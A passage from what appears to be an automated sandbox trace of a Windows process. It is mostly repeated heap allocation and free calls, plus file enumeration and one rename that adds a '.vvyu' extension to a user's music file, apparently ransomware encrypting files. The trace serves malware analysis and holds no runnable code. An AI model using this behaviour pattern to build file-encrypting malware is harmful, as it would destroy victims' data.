lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\jYMAb2bdVruj9SV.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\jymab2bdvruj9sv.m4a.vvyu")) returned 1 [0195.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.595] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0195.598] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77637e0, ftCreationTime.dwHighDateTime=0x1d89a32, ftLastAccessTime.dwLowDateTime=0xa6c307e0, ftLastAccessTime.dwHighDateTime=0x1d89c91, ftLastWriteTime.dwLowDateTime=0xa6c307e0, ftLastWriteTime.dwHighDateTime=0x1d89c91, nFileSizeHigh=0x0, nFileSizeLow=0x4283, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jYMAb2bdVruj9SV.m4a", cAlternateFileName="JYMAB2~1.M4A")) returned 0 [0195.598] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0195.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0195.599] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0195.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0195.599] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0195.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0195.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0195.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 